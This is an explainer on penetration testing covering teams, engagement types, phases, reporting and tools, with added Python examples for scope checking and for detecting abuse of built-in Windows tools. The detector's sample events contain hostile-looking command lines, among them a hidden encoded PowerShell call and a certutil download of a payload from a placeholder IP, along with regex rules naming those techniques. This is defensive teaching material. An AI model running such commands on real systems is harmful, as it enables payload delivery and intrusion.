Penetration testing, commonly known as pen testing, is a simulated cyberattack carried out by authorized ethical hackers, often a third party, that tests and evaluates the security of the target organization’s computer systems, networks, and application infrastructure.
Human operators attempt to find vulnerabilities and exploit them using a mix of tooling and manual procedures. Pen testers execute a variety of tests designed to exercise known vulnerabilities and leverage misconfigurations in software and security controls. Their goal is to identify real-world weaknesses in an organization’s security posture that an attacker could exploit. Pen testers often mimic the behavior of real threat actors, including techniques such as social engineering. Once these weaknesses are identified, they can be prioritized for remediation. Penetration testing is an iterative process, and repeated over time it reduces the risk of a successful cyberattack against the organization.
Who is involved with penetration testing?
Several teams take part in the penetration testing process: the red team, the blue team, and in some organizations, the purple team. The red team consists of the actual penetration testers. They design and carry out tests to penetrate the perimeter, obtain credentials, access restricted systems and data, and compromise resources. The blue team is staffed by information security professionals who defend the environment day to day. Blue team members are often responsible for the set-up and configuration of security controls, among other responsibilities, and for detecting and responding to the red team’s activity during the test. The purple team is a function that facilitates communication and the resolution of action items between the red and blue teams. It benefits from the blue team’s knowledge of the infrastructure and the red team’s knowledge of the vulnerabilities discovered, and uses that information to drive continuous security improvement across the organization.
Penetration tests vary widely in scope. External network penetration tests target the network perimeter and components reachable from the internet, such as firewalls, intrusion detection systems (IDS), routers, VPN gateways, and other devices that filter traffic. External tests may also target other exposed assets such as web applications, websites, Domain Name System (DNS) servers, and email. Internal penetration tests place the tester behind the firewall or on the VPN and answer the question: once a threat actor has gotten past the perimeter, how much further can they move through the network? An internal penetration test can also simulate an attack by a malicious insider.
Types of Penetration Testing Engagements
The amount of information the target organization gives the pen test team further defines the engagement. Black-box penetration tests, also known as single-blind penetration tests, start with the tester knowing little more than the name of the target enterprise; usually they are given an IP address range or domain name to start. This approximates the knowledge a real-world threat actor would possess, although a real attacker would typically have more time to gather data and plan the attack. White-box penetration tests, also known as open-box or crystal-box tests, give the ethical hacker full information ahead of time about the company’s environment and security, which may include credentials, network diagrams, design documentation, and source code. Engagements that provide only limited information, such as a low-privileged user account, sit between the two and are usually called gray-box tests.
There are still other variations in how a penetration test is administered and designed. In a double-blind penetration test, the defenders are also kept in the dark: almost no security personnel have prior knowledge of the simulated attack, so the test measures detection and response as well as the vulnerabilities themselves.
In a targeted penetration test, there is cooperation between the security personnel and the ethical hacker. During the penetration test, both parties communicate the status of their activities.
Pen Test Phases
Penetration testing is often broken into several phases. The first is pre-engagement. During this phase the penetration testing team reviews the goals and objectives the target enterprise wants to achieve, agrees on the scope and rules of engagement, and begins to work out the best testing strategy for the organization.
The next phase is reconnaissance and planning. Here the pen testers gather as much information as possible about the target enterprise to learn about potential vulnerabilities. They then plan the simulated attack and choose the mix of tools, both software and hardware, and the social engineering techniques they will use. This comes together in the vulnerability mapping phase, where the testers select the attack vectors and techniques they will use; good vulnerability mapping depends on an accurate assessment of the vulnerabilities they may target. The fourth phase, exploitation, puts the plan into action: the ethical hacker attempts to penetrate the environment and reach the agreed objectives while avoiding detection.
When testing is complete, the pen testers clean up: they remove artifacts such as testing tools, intermediate data sets, and any hardware devices they planted, and revert anything else they modified or created during the test. The environment is returned to the state it was in before the test began.
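Before reconnaissance results are turned into targets, every discovered host has to be checked against the scope agreed during pre-engagement, because attacking an out-of-scope asset is unauthorized access regardless of intent. The following is an added example, not code from the original page or from Bugcrowd: it encodes a hypothetical rules-of-engagement scope (the CIDRs and domains are documentation ranges and placeholders, not a real client’s) and partitions constructed recon output into hosts that may be attacked and hosts that must not be. Exclusions win over inclusions, so a carve-out inside an in-scope range is honored, and a wildcard domain matches only true subdomains (so `evil-example.com` is not treated as part of `*.example.com`).

```python
import ipaddress

# Constructed, hypothetical rules-of-engagement scope for this example; not a real client's.
SCOPE = {
    "in_scope_cidrs": ["203.0.113.0/24", "198.51.100.0/25"],
    "excluded_cidrs": ["203.0.113.250/32"],          # carve-out inside an in-scope range
    "in_scope_domains": ["example.com", "*.example.com"],
    "excluded_domains": ["payroll.example.com"],
}


def _domain_matches(host, pattern):
    """Exact match, or wildcard '*.x' matching any subdomain of x (not x itself)."""
    host = host.lower().rstrip(".")
    pattern = pattern.lower()
    if pattern.startswith("*."):
        # pattern[1:] is ".x"; requiring that suffix means "evil-x" cannot match.
        return host.endswith(pattern[1:])
    return host == pattern


def _ip_in_any(ip, cidrs):
    return any(ip in ipaddress.ip_network(c, strict=False) for c in cidrs)


def in_scope(target, scope=SCOPE):
    """True only if target is explicitly in scope AND not carved out by an exclusion."""
    try:
        ip = ipaddress.ip_address(target)
    except ValueError:
        ip = None                                     # not an IP literal; treat as hostname
    if ip is not None:
        if _ip_in_any(ip, scope["excluded_cidrs"]):
            return False
        return _ip_in_any(ip, scope["in_scope_cidrs"])
    if any(_domain_matches(target, p) for p in scope["excluded_domains"]):
        return False
    return any(_domain_matches(target, p) for p in scope["in_scope_domains"])


def partition_targets(discovered, scope=SCOPE):
    """Split recon output into (allowed, rejected); only 'allowed' may be attacked."""
    allowed = [t for t in discovered if in_scope(t, scope)]
    rejected = [t for t in discovered if not in_scope(t, scope)]
    return allowed, rejected


if __name__ == "__main__":
    # Constructed recon results for the example.
    found = ["203.0.113.10", "203.0.113.250", "198.51.100.200",
             "api.example.com", "payroll.example.com", "evil-example.com"]
    ok, rejected = partition_targets(found)
    print("in scope :", ok)
    print("excluded :", rejected)
```

Feeding tool output through a check like this before scanning or exploitation is the practical safeguard against the most common engagement failure: a tester working from memory of the scope rather than from the signed document.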
Upon completion, the pen testing team submits a written report, and a briefing to review the findings is generally scheduled. A penetration test report should include an explanation of the methodologies used and how they were applied, technical findings, procedural findings, steps to reproduce each finding, a description of the risks discovered, recommendations, and conclusions. Reports can also be written against compliance requirements to meet the needs of ISO 27001, SOC 2 Type II, PCI DSS, HITRUST, FISMA, and other frameworks, and they often support risk assessments such as those required for HIPAA compliance.
The in-house teams (blue, purple, and others) then identify near-term areas that merit improvement, assign priorities, and build and initiate an implementation plan; the same is done for longer-term improvements. Correlating the pen test results with the organization’s own risk assessment is essential. The results can also provide important input to tool rationalization decisions.
Finally, the enterprise should schedule the penetration test again to validate that vulnerabilities identified were corrected and that the improved defenses now mitigate the penetration tester techniques previously tested.
Pen-testing tools range from purpose-built tools developed by ethical hackers to ordinary software already present in the target enterprise. Many of the tools ethical hackers use are open source. Widely used examples include Kali Linux (a distribution that bundles many of the others), Metasploit, Wireshark, and Mimikatz.
Using tools already present in the enterprise, by penetration testers and threat actors alike, is referred to as “living off the land.” Because these binaries and scripts are used by administrators every day, an attacker can blend into normal day-to-day activity on the target network. Even when suspicious activity is detected, telling malicious use from legitimate administration, and attributing it, becomes difficult to impossible.
Crowdsourced penetration testing is a new and rapidly growing method of penetration testing. Most crowdsourced plans draw on a large pool of remote, pay-per-project ethical hackers, who are often further incentivized by linking their pay to the results of the testing. Crowdsourced penetration testing has become a top choice for organizations that want to move quickly to expand and improve their security testing strategy.
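Because living-off-the-land activity uses the same binaries administrators use, detection has to key on how a tool is invoked and what spawned it rather than on the tool’s name alone. The following is an added example, not code from the original page or from Bugcrowd: a small detector run over constructed Windows process-creation records (the users, paths, and command lines are invented for the example). The rules are illustrative, not a complete ruleset: they flag certutil used as a downloader or decoder, PowerShell launched hidden or with an encoded command, regsvr32 and mshta pulling remote content, and an Office application spawning a shell. A benign `certutil -verify` in the same data is deliberately left unflagged to show that the rules discriminate on arguments, not on the binary.

```python
import re

# Constructed sample of Windows process-creation events (in the spirit of Event ID 4688),
# flattened to the fields the rules need. Not real log data.
SAMPLE_EVENTS = [
    {"user": "CORP\\svc-backup", "parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"user": "CORP\\jdoe", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"user": "CORP\\jdoe", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.7/payload.txt C:\\Users\\Public\\p.txt"},
    {"user": "CORP\\admin1", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\temp\\cert.cer"},            # legitimate admin use
    {"user": "CORP\\jdoe", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c whoami"},
]

# Illustrative command-line rules (name, regex). Each keys on the arguments, not the binary.
LOLBIN_RULES = [
    ("certutil_download_or_decode", r"certutil(\.exe)?\b.*(-urlcache|-decode|-encode)"),
    ("powershell_encoded_or_hidden",
     r"powershell(\.exe)?\b.*(-e(nc(odedcommand)?)?\b|-w(indowstyle)?\s+hidden)"),
    ("regsvr32_remote_scriptlet", r"regsvr32(\.exe)?\b.*/i:https?://"),
    ("mshta_remote_content", r"mshta(\.exe)?\b.*https?://"),
]
# Parent/child rule: a document editor should not be launching a command interpreter.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELLS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")


def _basename(win_path):
    """Last component of a Windows path, lower-cased (os.path won't split '\\' on Linux)."""
    return win_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_lolbin_abuse(events):
    """Return a list of (rule_name, event_index) for every rule each event trips."""
    findings = []
    for i, ev in enumerate(events):
        for name, pattern in LOLBIN_RULES:
            if re.search(pattern, ev["cmdline"], re.IGNORECASE):
                findings.append((name, i))
        if _basename(ev["parent"]) in OFFICE_PARENTS and _basename(ev["image"]) in SHELLS:
            findings.append(("office_spawns_shell", i))
    return findings


if __name__ == "__main__":
    for rule, idx in detect_lolbin_abuse(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{rule}] user={ev['user']} parent={_basename(ev['parent'])} cmd={ev['cmdline']}")
```

In practice such rules are one layer among several: the same events should also be correlated by user and host over time, since a single hidden PowerShell invocation is common but a hidden PowerShell followed by certutil downloads from an unfamiliar address is not.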
Get started with Bugcrowd
Hackers aren’t waiting, so why should you? See how Bugcrowd can quickly improve your security posture.